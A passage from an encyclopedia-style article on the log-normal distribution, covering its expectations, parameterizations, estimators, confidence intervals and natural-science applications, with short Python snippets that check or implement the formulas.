g ( k ) = ∫ k ∞ x f X ( x ∣ X > k ) d x = e μ + 1 2 σ 2 Φ ( μ − ln k σ − σ ) {\displaystyle {\begin{aligned}g(k)&=\int _{k}^{\infty }xf_{X}(x\mid X>k)\,dx\\[1ex]&=e^{\mu +{\tfrac {1}{2}}\sigma ^{2}}\,\Phi {\left({\frac {\mu -\ln k}{\sigma }}-\sigma \right)}\end{aligned}}}
where Φ {\displaystyle \Phi } is the normal cumulative distribution function . The partial expectation formula has applications in insurance and economics ; it is used in solving the partial differential equation leading to the Black–Scholes formula .
The conditional expectation of a log-normal random variable X {\displaystyle X} —with respect to a threshold k {\displaystyle k} —is its partial expectation divided by the cumulative probability of being in that range:
E [ X ∣ X < k ] = e μ + σ 2 2 ⋅ Φ [ ln k − μ σ − σ ] Φ [ ln k − μ σ ] E [ X ∣ X ≥ k ] = e μ + σ 2 2 ⋅ Φ [ μ − ln k σ + σ ] 1 − Φ [ ln k − μ σ ] E [ X ∣ X ∈ [ k 1 , k 2 ] ] = e μ + σ 2 2 ⋅ Φ [ ln k 2 − μ σ − σ ] − Φ [ ln k 1 − μ σ − σ ] Φ [ ln k 2 − μ σ ] − Φ [ ln k 1 − μ σ ] {\displaystyle {\begin{aligned}\operatorname {E} [X\mid X<k]&=e^{\mu +{\frac {\sigma ^{2}}{2}}}\cdot {\frac {\Phi {\left[{\frac {\ln k-\mu }{\sigma }}-\sigma \right]}}{\Phi {\left[{\frac {\ln k-\mu }{\sigma }}\right]}}}\\[8pt]\operatorname {E} [X\mid X\geq k]&=e^{\mu +{\frac {\sigma ^{2}}{2}}}\cdot {\frac {\Phi {\left[{\frac {\mu -\ln k}{\sigma }}+\sigma \right]}}{1-\Phi {\left[{\frac {\ln k-\mu }{\sigma }}\right]}}}\\[8pt]\operatorname {E} [X\mid X\in [k_{1},k_{2}]]&=e^{\mu +{\frac {\sigma ^{2}}{2}}}\cdot {\frac {\Phi {\left[{\frac {\ln k_{2}-\mu }{\sigma }}-\sigma \right]}-\Phi {\left[{\frac {\ln k_{1}-\mu }{\sigma }}-\sigma \right]}}{\Phi \left[{\frac {\ln k_{2}-\mu }{\sigma }}\right]-\Phi \left[{\frac {\ln k_{1}-\mu }{\sigma }}\right]}}\end{aligned}}}
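These conditional expectations can be verified by simulation; a minimal sketch for the case E[X | X ≥ k], with arbitrary illustrative values for μ, σ and k.

```python
import numpy as np
from scipy.stats import norm

mu, sigma, k = 0.0, 1.0, 2.0
closed_form = (np.exp(mu + sigma**2 / 2)
               * norm.cdf((mu - np.log(k)) / sigma + sigma)
               / (1 - norm.cdf((np.log(k) - mu) / sigma)))

rng = np.random.default_rng(1)
x = rng.lognormal(mu, sigma, size=2_000_000)
print(closed_form, x[x >= k].mean())   # the two values should nearly agree
```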
In addition to the characterization by μ , σ {\displaystyle \mu ,\sigma } or μ ∗ , σ ∗ {\displaystyle \mu ^{*},\sigma ^{*}} , there are multiple ways in which the log-normal distribution can be parameterized. ProbOnto , the knowledge base and ontology of probability distributions [ 22 ] [ 23 ] lists seven such forms:
Consider the situation when one would like to run a model using two different optimal design tools, for example PFIM [ 28 ] and PopED. [ 29 ] The former supports the LN2 parameterization, the latter LN7. Re-parameterization is therefore required, since otherwise the two tools would produce different results.
For the transition LN2 ( μ , v ) → LN7 ( μ N , σ N ) {\displaystyle \operatorname {LN2} (\mu ,v)\to \operatorname {LN7} (\mu _{N},\sigma _{N})} following formulas hold μ N = exp ( μ + v / 2 ) {\textstyle \mu _{N}=\exp(\mu +v/2)} and σ N = exp ( μ + v / 2 ) exp ( v ) − 1 {\textstyle \sigma _{N}=\exp(\mu +v/2){\sqrt {\exp(v)-1}}} .
For the transition LN7 ( μ N , σ N ) → LN2 ( μ , v ) {\displaystyle \operatorname {LN7} (\mu _{N},\sigma _{N})\to \operatorname {LN2} (\mu ,v)} following formulas hold μ = ln μ N − 1 2 v {\textstyle \mu =\ln \mu _{N}-{\frac {1}{2}}v} and v = ln ( 1 + σ N 2 / μ N 2 ) {\textstyle v=\ln(1+\sigma _{N}^{2}/\mu _{N}^{2})} .
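A direct transcription of the two transitions into Python (function names are illustrative and not part of either tool's API):

```python
import math

def ln2_to_ln7(mu, v):
    """LN2(mu, v) -> LN7(mu_N, sigma_N), the natural-scale mean and SD."""
    mu_n = math.exp(mu + v / 2)
    sigma_n = mu_n * math.sqrt(math.exp(v) - 1)
    return mu_n, sigma_n

def ln7_to_ln2(mu_n, sigma_n):
    """LN7(mu_N, sigma_N) -> LN2(mu, v)."""
    v = math.log(1 + sigma_n**2 / mu_n**2)
    mu = math.log(mu_n) - v / 2
    return mu, v

# A round trip should recover the original parameters:
print(ln7_to_ln2(*ln2_to_ln7(0.3, 0.5)))   # ~ (0.3, 0.5)
```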
All remaining re-parameterisation formulas can be found in the specification document on the project website. [ 30 ]
If two independent , log-normal variables X 1 {\displaystyle X_{1}} and X 2 {\displaystyle X_{2}} are multiplied [divided], the product [ratio] is again log-normal, with parameters μ = μ 1 + μ 2 {\displaystyle \mu =\mu _{1}+\mu _{2}} [ μ = μ 1 − μ 2 {\displaystyle \mu =\mu _{1}-\mu _{2}} ] and σ {\displaystyle \sigma } , where σ 2 = σ 1 2 + σ 2 2 {\displaystyle \sigma ^{2}=\sigma _{1}^{2}+\sigma _{2}^{2}} .
More generally, if X j ∼ Lognormal ( μ j , σ j 2 ) {\displaystyle X_{j}\sim \operatorname {Lognormal} (\mu _{j},\sigma _{j}^{2})} are n {\displaystyle n} independent, log-normally distributed variables, then Y = ∏ j = 1 n X j ∼ Lognormal ( ∑ j = 1 n μ j , ∑ j = 1 n σ j 2 ) . {\textstyle Y=\prod _{j=1}^{n}X_{j}\sim \operatorname {Lognormal} {\Big (}\sum _{j=1}^{n}\mu _{j},\sum _{j=1}^{n}\sigma _{j}^{2}{\Big )}.}
The geometric or multiplicative mean of n {\displaystyle n} independent, identically distributed, positive random variables X i {\displaystyle X_{i}} is, for n → ∞ {\displaystyle n\to \infty } , approximately log-normally distributed with parameters μ = E [ ln X i ] {\displaystyle \mu =\operatorname {E} [\ln X_{i}]} and σ 2 = var [ ln X i ] / n {\displaystyle \sigma ^{2}=\operatorname {var} [\ln X_{i}]/n} , assuming σ 2 {\displaystyle \sigma ^{2}} is finite.
In fact, the random variables do not have to be identically distributed. It is enough for the distributions of ln X i {\displaystyle \ln X_{i}} to all have finite variance and satisfy the other conditions of any of the many variants of the central limit theorem .
This is commonly known as Gibrat's law .
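The effect is easy to observe numerically: the log of the geometric mean of n i.i.d. positive draws concentrates around E[ln X_i] with variance var[ln X_i]/n. A minimal sketch, with an arbitrary choice of positive distribution:

```python
import numpy as np

rng = np.random.default_rng(2)
n, reps = 200, 20_000
samples = rng.uniform(0.5, 1.5, size=(reps, n))   # any positive i.i.d. variables
gmean = samples.prod(axis=1) ** (1.0 / n)         # geometric mean per row

logs = np.log(samples)
log_g = np.log(gmean)
print(log_g.mean(), logs.mean())      # ~ E[ln X_i]
print(log_g.var(), logs.var() / n)    # ~ var[ln X_i] / n
```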
Whether a log-normal distribution can be considered a true heavy-tailed distribution is still debated. The main reason is that its variance is always finite, unlike the case for certain Pareto distributions, for instance. However, a recent study has shown how it is possible to construct a log-normal distribution with infinite variance using Robinson's non-standard analysis . [ 31 ]
A set of data that arises from the log-normal distribution has a symmetric Lorenz curve (see also Lorenz asymmetry coefficient ). [ 32 ]
The harmonic H {\displaystyle H} , geometric G {\displaystyle G} and arithmetic A {\displaystyle A} means of this distribution are related; [ 33 ] the relation is given by
H = G 2 A . {\displaystyle H={\frac {G^{2}}{A}}.}
Log-normal distributions are infinitely divisible , [ 34 ] but they are not stable distributions , from which samples can easily be drawn. [ 35 ]
For a more accurate approximation, one can use the Monte Carlo method to estimate the cumulative distribution function, the pdf and the right tail. [ 38 ] [ 39 ]
The sum of correlated log-normally distributed random variables can also be approximated by a log-normal distribution [ citation needed ] S + = E [ ∑ i X i ] = ∑ i E [ X i ] = ∑ i e μ i + σ i 2 / 2 σ Z 2 = 1 S + 2 ∑ i , j cor i j σ i σ j E [ X i ] E [ X j ] = 1 S + 2 ∑ i , j cor i j σ i σ j e μ i + σ i 2 / 2 e μ j + σ j 2 / 2 μ Z = ln S + − σ Z 2 / 2 {\displaystyle {\begin{aligned}S_{+}&=\operatorname {E} \left[\sum _{i}X_{i}\right]=\sum _{i}\operatorname {E} [X_{i}]=\sum _{i}e^{\mu _{i}+\sigma _{i}^{2}/2}\\[2ex]\sigma _{Z}^{2}&={\frac {1}{S_{+}^{2}}}\,\sum _{i,j}\operatorname {cor} _{ij}\sigma _{i}\sigma _{j}\operatorname {E} [X_{i}]\operatorname {E} [X_{j}]\\[1ex]&={\frac {1}{S_{+}^{2}}}\,\sum _{i,j}\operatorname {cor} _{ij}\sigma _{i}\sigma _{j}e^{\mu _{i}+\sigma _{i}^{2}/2}e^{\mu _{j}+\sigma _{j}^{2}/2}\\[2ex]\mu _{Z}&=\ln S_{+}-\sigma _{Z}^{2}/2\end{aligned}}}
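A direct transcription of this moment-matching approximation; names are illustrative, and `corr` is assumed to be the matrix of the correlations cor_ij appearing above.

```python
import numpy as np

def lognormal_sum_approx(mu, sigma, corr):
    """Moment-matched (mu_Z, sigma_Z^2) for a sum of correlated log-normals.

    mu, sigma : 1-D arrays of the summands' log-scale parameters
    corr      : matrix of correlations cor_ij between the summands
    """
    mu, sigma = np.asarray(mu), np.asarray(sigma)
    m = np.exp(mu + sigma**2 / 2)                 # E[X_i]
    s_plus = m.sum()                              # S_+
    sigma_z2 = (corr * np.outer(sigma, sigma) * np.outer(m, m)).sum() / s_plus**2
    mu_z = np.log(s_plus) - sigma_z2 / 2
    return mu_z, sigma_z2
```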
For determining the maximum likelihood estimators of the log-normal distribution parameters μ and σ , we can use the same procedure as for the normal distribution . Note that L ( μ , σ ) = ∏ i = 1 n 1 x i φ μ , σ ( ln x i ) , {\displaystyle L(\mu ,\sigma )=\prod _{i=1}^{n}{\frac {1}{x_{i}}}\varphi _{\mu ,\sigma }(\ln x_{i}),} where φ {\displaystyle \varphi } is the density function of the normal distribution N ( μ , σ 2 ) {\displaystyle {\mathcal {N}}(\mu ,\sigma ^{2})} . Therefore, the log-likelihood function is ℓ ( μ , σ ∣ x 1 , x 2 , … , x n ) = − ∑ i ln x i + ℓ N ( μ , σ ∣ ln x 1 , ln x 2 , … , ln x n ) . {\displaystyle \ell (\mu ,\sigma \mid x_{1},x_{2},\ldots ,x_{n})=-\sum _{i}\ln x_{i}+\ell _{N}(\mu ,\sigma \mid \ln x_{1},\ln x_{2},\dots ,\ln x_{n}).}
Since the first term is constant with regard to μ and σ , both logarithmic likelihood functions, ℓ {\displaystyle \ell } and ℓ N {\displaystyle \ell _{N}} , reach their maximum with the same μ {\displaystyle \mu } and σ {\displaystyle \sigma } . Hence, the maximum likelihood estimators are identical to those for a normal distribution for the observations ln x 1 , ln x 2 , … , ln x n {\displaystyle \ln x_{1},\ln x_{2},\dots ,\ln x_{n}} , μ ^ = ∑ i ln x i n , σ ^ 2 = ∑ i ( ln x i − μ ^ ) 2 n . {\displaystyle {\widehat {\mu }}={\frac {\sum _{i}\ln x_{i}}{n}},\qquad {\widehat {\sigma }}^{2}={\frac {\sum _{i}{\left(\ln x_{i}-{\widehat {\mu }}\right)}^{2}}{n}}.}
For finite n , the estimator for μ {\displaystyle \mu } is unbiased, but the one for σ {\displaystyle \sigma } is biased. As for the normal distribution, an unbiased estimator for σ {\displaystyle \sigma } can be obtained by replacing the denominator n by n −1 in the equation for σ ^ 2 {\displaystyle {\widehat {\sigma }}^{2}} .
From this, the MLE for the expectation of X is: [ 43 ] θ ^ MLE = E [ X ] ^ MLE = e μ ^ + σ ^ 2 / 2 {\displaystyle {\widehat {\theta }}_{\text{MLE}}={\widehat {\operatorname {E} [X]}}_{\text{MLE}}=e^{{\hat {\mu }}+{{\hat {\sigma }}^{2}}/{2}}}
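A sketch of these estimators on raw data; note that NumPy's default variance divisor n matches the MLE form above, and the plug-in estimate of E[X] is the θ̂_MLE just given.

```python
import numpy as np

def lognormal_mle(x):
    """ML estimates (mu_hat, sigma2_hat) and the plug-in MLE of E[X]."""
    logx = np.log(np.asarray(x))
    mu_hat = logx.mean()
    sigma2_hat = logx.var()                 # divides by n, as in the MLE
    theta_hat = np.exp(mu_hat + sigma2_hat / 2)
    return mu_hat, sigma2_hat, theta_hat
```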
When the individual values x 1 , x 2 , … , x n {\displaystyle x_{1},x_{2},\ldots ,x_{n}} are not available, but the sample's mean x ¯ {\displaystyle {\bar {x}}} and standard deviation σ ^ {\displaystyle {\widehat {\sigma }}} are, then the method of moments can be used. The corresponding parameters are determined by the following formulas, obtained from solving the equations for the expectation E [ X ] {\displaystyle \operatorname {E} [X]} and variance Var [ X ] {\displaystyle \operatorname {Var} [X]} for μ {\displaystyle \mu } and σ {\displaystyle \sigma } : [ 44 ] μ = ln x ¯ 1 + σ ^ 2 / x ¯ 2 , σ 2 = ln ( 1 + σ ^ 2 / x ¯ 2 ) . {\displaystyle {\begin{aligned}\mu &=\ln {\frac {\bar {x}}{\sqrt {1+{\widehat {\sigma }}^{2}/{\bar {x}}^{2}}}},\\[1ex]\sigma ^{2}&=\ln \left(1+{{\widehat {\sigma }}^{2}}/{\bar {x}}^{2}\right).\end{aligned}}}
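A small simulation comparing the method-of-moments estimates (computed from the sample mean and standard deviation alone) with the MLE computed from the individual log values; all numbers are illustrative.

```python
import numpy as np

rng = np.random.default_rng(3)
x = rng.lognormal(mean=1.0, sigma=0.5, size=10_000)

# Method of moments, using only the sample mean and standard deviation:
xbar, s = x.mean(), x.std()
sigma2_mom = np.log(1 + s**2 / xbar**2)
mu_mom = np.log(xbar) - sigma2_mom / 2
print(mu_mom, sigma2_mom)                 # ~ (1.0, 0.25)

# MLE, which needs the individual log values:
print(np.log(x).mean(), np.log(x).var())  # ~ (1.0, 0.25)
```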
Other estimators also exist, such as Finney's UMVUE estimator, [ 45 ] the "Approximately Minimum Mean Squared Error Estimator", the "Approximately Unbiased Estimator" and "Minimax Estimator", [ 46 ] also "A Conditional Mean Squared Error Estimator", [ 47 ] and other variations as well. [ 48 ] [ 49 ]
The most efficient way to obtain interval estimates when analyzing log-normally distributed data consists of applying the well-known methods based on the normal distribution to logarithmically transformed data and then back-transforming the results if appropriate.
A basic example is given by prediction intervals : For the normal distribution, the interval [ μ − σ , μ + σ ] {\displaystyle [\mu -\sigma ,\mu +\sigma ]} contains approximately two thirds (68%) of the probability (or of a large sample), and [ μ − 2 σ , μ + 2 σ ] {\displaystyle [\mu -2\sigma ,\mu +2\sigma ]} contains 95%. Therefore, for a log-normal distribution,
Using this principle, note that a confidence interval for μ {\displaystyle \mu } is [ μ ^ ± q ⋅ s e ^ ] {\displaystyle [{\widehat {\mu }}\pm q\cdot {\widehat {\mathop {se} }}]} , where s e = σ ^ / n {\displaystyle \mathop {se} ={\widehat {\sigma }}/{\sqrt {n}}} is the standard error and q is the 97.5% quantile of a t distribution with n − 1 degrees of freedom. Back-transformation leads to a confidence interval for μ ∗ = e μ {\displaystyle \mu ^{*}=e^{\mu }} (the median), namely [ μ ^ ∗ × / ( sem ∗ ) q ] {\displaystyle [{\widehat {\mu }}^{*}{}^{\times }\!\!/(\operatorname {sem} ^{*})^{q}]} with sem ∗ = ( σ ^ ∗ ) 1 / n {\displaystyle \operatorname {sem} ^{*}=({\widehat {\sigma }}^{*})^{1/{\sqrt {n}}}}
The literature discusses several options for calculating the confidence interval for μ {\displaystyle \mu } (the mean of the log-normal distribution). These include bootstrap as well as various other methods. [ 50 ] [ 51 ]
The Cox method [ a ] proposes plugging in the estimators μ ^ = ∑ i ln x i n , S 2 = ∑ i ( ln x i − μ ^ ) 2 n − 1 {\displaystyle {\widehat {\mu }}={\frac {\sum _{i}\ln x_{i}}{n}},\qquad S^{2}={\frac {\sum _{i}\left(\ln x_{i}-{\widehat {\mu }}\right)^{2}}{n-1}}}
and use them to construct approximate confidence intervals in the following way: C I ( E ( X ) ) : exp ( μ ^ + S 2 2 ± z 1 − α 2 S 2 n + S 4 2 ( n − 1 ) ) {\displaystyle \mathrm {CI} (\operatorname {E} (X)):\exp \left({\hat {\mu }}+{\frac {S^{2}}{2}}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S^{2}}{n}}+{\frac {S^{4}}{2(n-1)}}}}\right)}
We know that E ( X ) = e μ + σ 2 2 {\displaystyle \operatorname {E} (X)=e^{\mu +{\frac {\sigma ^{2}}{2}}}} . Also, μ ^ {\displaystyle {\widehat {\mu }}} is a normal distribution with parameters: μ ^ ∼ N ( μ , σ 2 n ) {\displaystyle {\widehat {\mu }}\sim N\left(\mu ,{\frac {\sigma ^{2}}{n}}\right)}
S 2 {\displaystyle S^{2}} has a chi-squared distribution , which is approximately normally distributed (via CLT ), with parameters : S 2 ∼ ˙ N ( σ 2 , 2 σ 4 n − 1 ) {\displaystyle S^{2}{\dot {\sim }}N\left(\sigma ^{2},{\frac {2\sigma ^{4}}{n-1}}\right)} . Hence, S 2 2 ∼ ˙ N ( σ 2 2 , σ 4 2 ( n − 1 ) ) {\displaystyle {\frac {S^{2}}{2}}{\dot {\sim }}N\left({\frac {\sigma ^{2}}{2}},{\frac {\sigma ^{4}}{2(n-1)}}\right)} .
Since the sample mean and variance are independent, and the sum of normally distributed variables is also normal , we get that: μ ^ + S 2 2 ∼ ˙ N ( μ + σ 2 2 , σ 2 n + σ 4 2 ( n − 1 ) ) {\displaystyle {\widehat {\mu }}+{\frac {S^{2}}{2}}{\dot {\sim }}N\left(\mu +{\frac {\sigma ^{2}}{2}},{\frac {\sigma ^{2}}{n}}+{\frac {\sigma ^{4}}{2(n-1)}}\right)} Based on the above, standard confidence intervals for μ + σ 2 2 {\displaystyle \mu +{\frac {\sigma ^{2}}{2}}} can be constructed (using a Pivotal quantity ) as: μ ^ + S 2 2 ± z 1 − α 2 S 2 n + S 4 2 ( n − 1 ) {\displaystyle {\hat {\mu }}+{\frac {S^{2}}{2}}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S^{2}}{n}}+{\frac {S^{4}}{2(n-1)}}}}} And since confidence intervals are preserved for monotonic transformations, we get that: C I ( E [ X ] = e μ + σ 2 2 ) : exp ( μ ^ + S 2 2 ± z 1 − α 2 S 2 n + S 4 2 ( n − 1 ) ) {\displaystyle \mathrm {CI} \left(\operatorname {E} [X]=e^{\mu +{\frac {\sigma ^{2}}{2}}}\right):\exp \left({\hat {\mu }}+{\frac {S^{2}}{2}}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S^{2}}{n}}+{\frac {S^{4}}{2(n-1)}}}}\right)}
As desired.
Olsson (2005) proposed a "modified Cox method" by replacing z 1 − α 2 {\displaystyle z_{1-{\frac {\alpha }{2}}}} with t n − 1 , 1 − α 2 {\displaystyle t_{n-1,1-{\frac {\alpha }{2}}}} , which seemed to provide better coverage results for small sample sizes. [ 50 ] : Section 3.4
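A sketch of the Cox interval with the modified variant toggled by a flag; the function name is illustrative.

```python
import numpy as np
from scipy.stats import norm, t

def cox_ci_mean(x, alpha=0.05, modified=False):
    """Cox-type CI for E[X] of log-normal data; modified=True uses t_{n-1}."""
    logx = np.log(np.asarray(x))
    n = len(logx)
    mu_hat, s2 = logx.mean(), logx.var(ddof=1)       # S^2 divides by n - 1
    half = np.sqrt(s2 / n + s2**2 / (2 * (n - 1)))
    q = t.ppf(1 - alpha / 2, n - 1) if modified else norm.ppf(1 - alpha / 2)
    center = mu_hat + s2 / 2
    return np.exp(center - q * half), np.exp(center + q * half)
```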
Comparing two log-normal distributions can often be of interest, for example, from a treatment and control group (e.g., in an A/B test ). We have samples from two independent log-normal distributions with parameters ( μ 1 , σ 1 2 ) {\displaystyle (\mu _{1},\sigma _{1}^{2})} and ( μ 2 , σ 2 2 ) {\displaystyle (\mu _{2},\sigma _{2}^{2})} , with sample sizes n 1 {\displaystyle n_{1}} and n 2 {\displaystyle n_{2}} respectively.
Comparing the medians of the two can easily be done by taking the log of each sample, constructing a straightforward confidence interval on the log scale, and transforming it back to the exponential scale.
C I ( e μ 1 − μ 2 ) : exp ( μ ^ 1 − μ ^ 2 ± z 1 − α 2 S 1 2 n 1 + S 2 2 n 2 ) {\displaystyle \mathrm {CI} (e^{\mu _{1}-\mu _{2}}):\exp \left({\hat {\mu }}_{1}-{\hat {\mu }}_{2}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n_{1}}}+{\frac {S_{2}^{2}}{n_{2}}}}}\right)}
These CIs are what is often used in epidemiology for calculating the CI for relative risk and odds ratio . [ 54 ] The way it is done there is that we have two approximately normal distributions (e.g., p 1 and p 2 , for RR), and we wish to calculate their ratio. [ b ]
However, the ratio of the expectations (means) of the two samples might also be of interest, while requiring more work to develop. The ratio of their means is:
E ( X 1 ) E ( X 2 ) = e μ 1 + σ 1 2 / 2 e μ 2 + σ 2 2 / 2 = e ( μ 1 − μ 2 ) + 1 2 ( σ 1 2 − σ 2 2 ) {\displaystyle {\frac {\operatorname {E} (X_{1})}{\operatorname {E} (X_{2})}}={\frac {e^{\mu _{1}+\sigma _{1}^{2}/2}}{e^{\mu _{2}+\sigma _{2}^{2}/2}}}=e^{(\mu _{1}-\mu _{2})+{\frac {1}{2}}\left(\sigma _{1}^{2}-\sigma _{2}^{2}\right)}}
Plugging in the estimators for each of these parameters also yields a log-normal distribution, which means that the Cox method, discussed above, can similarly be used for this use case:
C I ( E ( X 1 ) E ( X 2 ) = e μ 1 + σ 1 2 / 2 e μ 2 + σ 2 2 / 2 ) : exp ( ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ± z 1 − α 2 S 1 2 n 1 + S 2 2 n 2 + S 1 4 2 ( n 1 − 1 ) + S 2 4 2 ( n 2 − 1 ) ) {\displaystyle \mathrm {CI} \left({\frac {\operatorname {E} (X_{1})}{\operatorname {E} (X_{2})}}={\frac {e^{\mu _{1}+\sigma _{1}^{2}/2}}{e^{\mu _{2}+\sigma _{2}^{2}/2}}}\right):\exp \left(\left({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\tfrac {1}{2}}S_{1}^{2}-{\tfrac {1}{2}}S_{2}^{2}\right)\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n_{1}}}+{\frac {S_{2}^{2}}{n_{2}}}+{\frac {S_{1}^{4}}{2(n_{1}-1)}}+{\frac {S_{2}^{4}}{2(n_{2}-1)}}}}\right)}
To construct a confidence interval for this ratio, we first note that μ ^ 1 − μ ^ 2 {\displaystyle {\hat {\mu }}_{1}-{\hat {\mu }}_{2}} follows a normal distribution, and that both S 1 2 {\displaystyle S_{1}^{2}} and S 2 2 {\displaystyle S_{2}^{2}} have chi-squared distributions , which are approximately normally distributed (via the CLT , with the relevant parameters).
This means that ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ∼ N ( ( μ 1 − μ 2 ) + 1 2 ( σ 1 2 − σ 2 2 ) , σ 1 2 n 1 + σ 2 2 n 2 + σ 1 4 2 ( n 1 − 1 ) + σ 2 4 2 ( n 2 − 1 ) ) {\displaystyle ({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\frac {1}{2}}S_{1}^{2}-{\frac {1}{2}}S_{2}^{2})\sim N\left((\mu _{1}-\mu _{2})+{\frac {1}{2}}(\sigma _{1}^{2}-\sigma _{2}^{2}),{\frac {\sigma _{1}^{2}}{n_{1}}}+{\frac {\sigma _{2}^{2}}{n_{2}}}+{\frac {\sigma _{1}^{4}}{2(n_{1}-1)}}+{\frac {\sigma _{2}^{4}}{2(n_{2}-1)}}\right)}
Based on the above, standard confidence intervals can be constructed (using a Pivotal quantity ) as: ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ± z 1 − α 2 S 1 2 n 1 + S 2 2 n 2 + S 1 4 2 ( n 1 − 1 ) + S 2 4 2 ( n 2 − 1 ) {\displaystyle ({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\frac {1}{2}}S_{1}^{2}-{\frac {1}{2}}S_{2}^{2})\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n_{1}}}+{\frac {S_{2}^{2}}{n_{2}}}+{\frac {S_{1}^{4}}{2(n_{1}-1)}}+{\frac {S_{2}^{4}}{2(n_{2}-1)}}}}} And since confidence intervals are preserved for monotonic transformations, we get that: C I ( E ( X 1 ) E ( X 2 ) = e μ 1 + σ 1 2 2 e μ 2 + σ 2 2 2 ) : e ( ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ± z 1 − α 2 S 1 2 n 1 + S 2 2 n 2 + S 1 4 2 ( n 1 − 1 ) + S 2 4 2 ( n 2 − 1 ) ) {\displaystyle CI\left({\frac {\operatorname {E} (X_{1})}{\operatorname {E} (X_{2})}}={\frac {e^{\mu _{1}+{\frac {\sigma _{1}^{2}}{2}}}}{e^{\mu _{2}+{\frac {\sigma _{2}^{2}}{2}}}}}\right):e^{\left(({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\frac {1}{2}}S_{1}^{2}-{\frac {1}{2}}S_{2}^{2})\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n_{1}}}+{\frac {S_{2}^{2}}{n_{2}}}+{\frac {S_{1}^{4}}{2(n_{1}-1)}}+{\frac {S_{2}^{4}}{2(n_{2}-1)}}}}\right)}}
As desired.
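A direct transcription of this interval for the ratio of means (illustrative function name; two positive samples as input):

```python
import numpy as np
from scipy.stats import norm

def ci_ratio_of_means(x1, x2, alpha=0.05):
    """Cox-type CI for E[X1]/E[X2] from two independent log-normal samples."""
    l1, l2 = np.log(np.asarray(x1)), np.log(np.asarray(x2))
    n1, n2 = len(l1), len(l2)
    s1, s2 = l1.var(ddof=1), l2.var(ddof=1)
    center = (l1.mean() - l2.mean()) + 0.5 * (s1 - s2)
    half = norm.ppf(1 - alpha / 2) * np.sqrt(
        s1 / n1 + s2 / n2 + s1**2 / (2 * (n1 - 1)) + s2**2 / (2 * (n2 - 1)))
    return np.exp(center - half), np.exp(center + half)
```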
It is worth noting that naively using the MLE in the ratio of the two expectations to create a ratio estimator leads to a consistent , yet biased, point estimate (we use the fact that the estimator of the ratio is log-normally distributed): [ c ] [ citation needed ]
E [ E ^ ( X 1 ) E ^ ( X 2 ) ] = E [ exp ( ( μ ^ 1 − μ ^ 2 ) + 1 2 ( S 1 2 − S 2 2 ) ) ] ≈ exp [ ( μ 1 − μ 2 ) + 1 2 ( σ 1 2 − σ 2 2 ) + 1 2 ( σ 1 2 n 1 + σ 2 2 n 2 + σ 1 4 2 ( n 1 − 1 ) + σ 2 4 2 ( n 2 − 1 ) ) ] {\displaystyle {\begin{aligned}\operatorname {E} \left[{\frac {{\widehat {\operatorname {E} }}(X_{1})}{{\widehat {\operatorname {E} }}(X_{2})}}\right]&=\operatorname {E} \left[\exp \left(\left({\widehat {\mu }}_{1}-{\widehat {\mu }}_{2}\right)+{\tfrac {1}{2}}\left(S_{1}^{2}-S_{2}^{2}\right)\right)\right]\\&\approx \exp \left[{(\mu _{1}-\mu _{2})+{\frac {1}{2}}(\sigma _{1}^{2}-\sigma _{2}^{2})+{\frac {1}{2}}\left({\frac {\sigma _{1}^{2}}{n_{1}}}+{\frac {\sigma _{2}^{2}}{n_{2}}}+{\frac {\sigma _{1}^{4}}{2(n_{1}-1)}}+{\frac {\sigma _{2}^{4}}{2(n_{2}-1)}}\right)}\right]\end{aligned}}}
In applications, σ {\displaystyle \sigma } is a parameter to be determined. For growing processes balanced by production and dissipation, the use of an extremal principle of Shannon entropy shows that [ 55 ] σ = 1 6 {\displaystyle \sigma ={\frac {1}{\sqrt {6}}}}
This value can then be used to give some scaling relation between the inflexion point and maximum point of the log-normal distribution. [ 55 ] This relationship is determined by the base of the natural logarithm, e = 2.718 … {\displaystyle e=2.718\ldots } , and exhibits some geometrical similarity to the minimal surface energy principle.
These scaling relations are useful for predicting a number of growth processes (epidemic spreading, droplet splashing, population growth, swirling rate of the bathtub vortex, distribution of language characters, velocity profile of turbulences, etc.).
For example, the log-normal function with such σ {\displaystyle \sigma } fits well with the size of secondarily produced droplets during droplet impact [ 56 ] and the spreading of an epidemic disease. [ 57 ]
The value σ = 1 / 6 {\textstyle \sigma =1{\big /}{\sqrt {6}}} is used to provide a probabilistic solution for the Drake equation. [ 58 ]
The log-normal distribution is important in the description of natural phenomena. Many natural growth processes are driven by the accumulation of many small percentage changes which become additive on a log scale. Under appropriate regularity conditions, the distribution of the resulting accumulated changes will be increasingly well approximated by a log-normal, as noted in the section above on " Multiplicative Central Limit Theorem ". This is also known as Gibrat's law , after Robert Gibrat (1904–1980), who formulated it for companies. [ 59 ] If the rate of accumulation of these small changes does not vary over time, growth becomes independent of size. Even if this assumption is not true, the size distributions at any age of things that grow over time tend to be log-normal. [ citation needed ] Consequently, reference ranges for measurements in healthy individuals are more accurately estimated by assuming a log-normal distribution than by assuming a symmetric distribution about the mean. [ citation needed ]
A second justification is based on the observation that fundamental natural laws imply multiplications and divisions of positive variables. Examples are the simple gravitation law connecting masses and distance with the resulting force, or the formula for equilibrium concentrations of chemicals in a solution that connects concentrations of educts and products. Assuming log-normal distributions of the variables involved leads to consistent models in these cases.
Specific examples are given in the following subsections. [ 60 ] contains a review and table of log-normal distributions from geology, biology, medicine, food, ecology, and other areas; [ 61 ] is a review article on log-normal distributions in neuroscience, with an annotated bibliography.
